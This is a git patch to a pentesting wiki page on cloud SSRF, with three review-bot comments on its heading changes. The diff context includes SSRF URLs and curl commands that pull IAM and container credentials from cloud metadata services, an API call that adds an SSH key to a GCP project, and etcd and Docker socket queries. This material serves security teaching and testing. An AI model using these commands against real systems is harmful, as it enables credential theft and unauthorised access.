From ff681fc8fc29a89b1442f014ab9f1293893a911e Mon Sep 17 00:00:00 2001 From: CPol Date: Mon, 2 May 2022 18:53:13 +0000 Subject: [PATCH] GitBook: [#3174] No subject --- .../cloud-ssrf.md | 44 +++++++++---------- 1 file changed, 21 insertions(+), 23 deletions(-) diff --git a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md index 48148d8f..5bff964e 100644 --- a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md +++ b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md @@ -1,4 +1,4 @@ - +# Cloud SSRF
@@ -16,12 +16,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+## AWS -# AWS +### Abusing SSRF in AWS EC2 environment -## Abusing SSRF in AWS EC2 environment - -### 169.254.169.254 - Metadata Address +#### 169.254.169.254 - Metadata Address **Metadata** of the basic virtual machines from AWS (called EC2) can be retrieved from the VM accessing the url: `http://169.254.169.254` ([information about the metadata here](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html)). @@ -74,7 +73,7 @@ Another possible interesting place where you can find credentials is in[ http:// [**PACU**](https://github.com/RhinoSecurityLabs/pacu) can be used with the discovered credentials to find out your privileges and try to escalate privileges -## SSRF in AWS ECS (Container Service) credentials +### SSRF in AWS ECS (Container Service) credentials **ECS**, is a logical group of EC2 instances on which you can run an application without having to scale your own cluster management infrastructure because ECS manages that for you. If you manage to compromise service running in **ECS**, the **metadata endpoints change**. @@ -86,7 +85,7 @@ You could be able to read it exploiting an **Path Traversal** to _file:///proc/s curl "http://169.254.170.2/$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" 2>/dev/null || wget "http://169.254.170.2/$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" -O - ``` -## SSRF URL for AWS Elastic Beanstalk +### SSRF URL for AWS Elastic Beanstalk We retrieve the `accountId` and `region` from the API. 
@@ -105,9 +104,11 @@ http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbean Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`. -# GCP +## GCP -## SSRF URL for Google Cloud +You can [**find here the docs about metadata endpoints**](https://cloud.google.com/appengine/docs/standard/java/accessing-instance-metadata). + +### SSRF URL for Google Cloud Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" and you can access the metadata endpoint in with the following URLs: @@ -193,7 +194,7 @@ http://metadata.google.internal/computeMetadata/v1beta1/ http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true ``` -## Add an SSH key +### Add an SSH key Extract the token @@ -222,7 +223,7 @@ curl -X POST "https://www.googleapis.com/compute/v1/projects/1042377752888/setCo --data '{"items": [{"key": "sshkeyname", "value": "sshkeyvalue"}]}' ``` -# Digital Ocean +## Digital Ocean Documentation available at [`https://developers.digitalocean.com/documentation/metadata/`](https://developers.digitalocean.com/documentation/metadata/) @@ -238,11 +239,11 @@ http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/addressAll in one re curl http://169.254.169.254/metadata/v1.json | jq ``` -# Packetcloud +## Packetcloud Documentation available at [`https://metadata.packet.net/userdata`](https://metadata.packet.net/userdata) -# Azure +## Azure Limited, maybe more exists? [`https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/`](https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/) @@ -255,7 +256,7 @@ http://169.254.169.254/metadata/instance?api-version=2017-04-02 http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text ``` -# OpenStack/RackSpace +## OpenStack/RackSpace (header required? unknown) 
@@ -263,7 +264,7 @@ http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/pu http://169.254.169.254/openstack ``` -# HP Helion +## HP Helion (header required? unknown) @@ -271,7 +272,7 @@ http://169.254.169.254/openstack http://169.254.169.254/2009-04-04/meta-data/ ``` -# Oracle Cloud +## Oracle Cloud ``` http://192.0.0.192/latest/ @@ -280,7 +281,7 @@ http://192.0.0.192/latest/meta-data/ http://192.0.0.192/latest/attributes/ ``` -# Alibaba +## Alibaba ``` http://100.100.100.200/latest/meta-data/ @@ -288,7 +289,7 @@ http://100.100.100.200/latest/meta-data/instance-id http://100.100.100.200/latest/meta-data/image-id ``` -# Kubernetes ETCD +## Kubernetes ETCD Can contain API keys and internal ip and ports @@ -297,7 +298,7 @@ curl -L http://127.0.0.1:2379/version curl http://127.0.0.1:2379/v2/keys/?recursive=true ``` -# Docker +## Docker ``` http://127.0.0.1:2375/v1.24/containers/jsonSimple example @@ -306,13 +307,12 @@ bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json ``` -# Rancher +## Rancher ``` curl http://rancher-metadata// ``` -
Support HackTricks and get benefits! @@ -328,5 +328,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- -
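Review bot: The heading demotion in the `@@ -16,12 +16,11 @@` hunk (`# AWS` → `## AWS`, `## Abusing SSRF in AWS EC2 environment` → `### …`, `### 169.254.169.254 - Metadata Address` → `#### …`) is the right fix once `# Cloud SSRF` becomes the only H1, but the hunk only covers the headings that appear in it; any other `##`/`###` headings in the AWS section that fall outside the shown context (for example around the `aws-elasticbean…` security-credentials block) would need the same one-level demotion, so a grep for `^#` over the whole file before merging would confirm the hierarchy is consistent end to end.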
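Review bot: In the `@@ -105,9 +104,11 @@` hunk the new line `You can [**find here the docs about metadata endpoints**](https://cloud.google.com/appengine/docs/standard/java/accessing-instance-metadata)` links an App Engine page (per its URL path) while the section it introduces lists Compute Engine endpoints (`http://metadata.google.internal/computeMetadata/v1beta1/…` with the `Metadata-Flavor: Google` header); consider either naming the link as the App Engine variant or additionally referencing the Compute Engine metadata documentation so readers are not pointed at the wrong service's docs.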
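Review bot: The final `@@ -328,5 +328,3 @@` hunk only strips two trailing blank lines after the "Share your hacking tricks…" footer; this is a cosmetic change, but check that the file still ends with a single terminating newline so the diff does not introduce a "No newline at end of file" marker.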